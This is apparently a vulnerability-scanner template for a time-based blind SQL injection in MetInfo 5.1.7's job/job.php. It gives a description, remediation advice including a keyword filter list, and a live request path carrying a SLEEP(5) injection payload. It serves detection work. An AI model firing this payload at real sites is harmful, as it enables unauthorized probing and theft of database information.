id: Metinfo-V5_1_7_job_php-BindSQLi
info:
  name: Metinfo v5.1.7 job/job.php met_column parameter SQL blind injection.
  author:
  - l0ne1y
  description: |-
    Metinfo v5.1.7 job/job.php met_column parameter SQL blind injection.
    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    The MetInfo 5.1.7 column page has an SQL injection vulnerability. An attacker can exploit it to obtain sensitive database information.
  severity: critical
  remediation: |-
    Remediation

    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.mituo.cn/

    Temporary Fix:<br />1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user-input variables into SQL statements. Virtually all database systems provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.<br />2. Escape special characters (such as '"<>&*;) entering the database, or perform encoding conversion.<br />3. Validate the type of each piece of data; for example, numeric data must be numeric and the corresponding database field must be of type int.<br />4. Strictly enforce data length limits, which to some degree prevents long SQL injection statements from executing correctly.<br />5. Use consistent encoding across every data layer of the website; UTF-8 is recommended. Inconsistent encoding between layers may allow some filtering mechanisms to be bypassed.<br />6. Strictly limit the database privileges of the website user, granting only the privileges needed to perform their work, thereby minimizing the damage injection attacks can cause to the database.<br />7. Avoid displaying SQL error messages, such as type errors or field mismatches, to prevent attackers from using such error information for reconnaissance.<br />8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and stop execution if matched.
requests:
- matchers:
  - type: dsl
    dsl:
    - duration>=4
  matchers-condition: and
  path:
  - '{{BaseURL}}/job/job.php?lang=cn&id=1&settings[met_column]=met_admin_table%20where%201%20AND%20SLEEP(5)--'
  method: GET
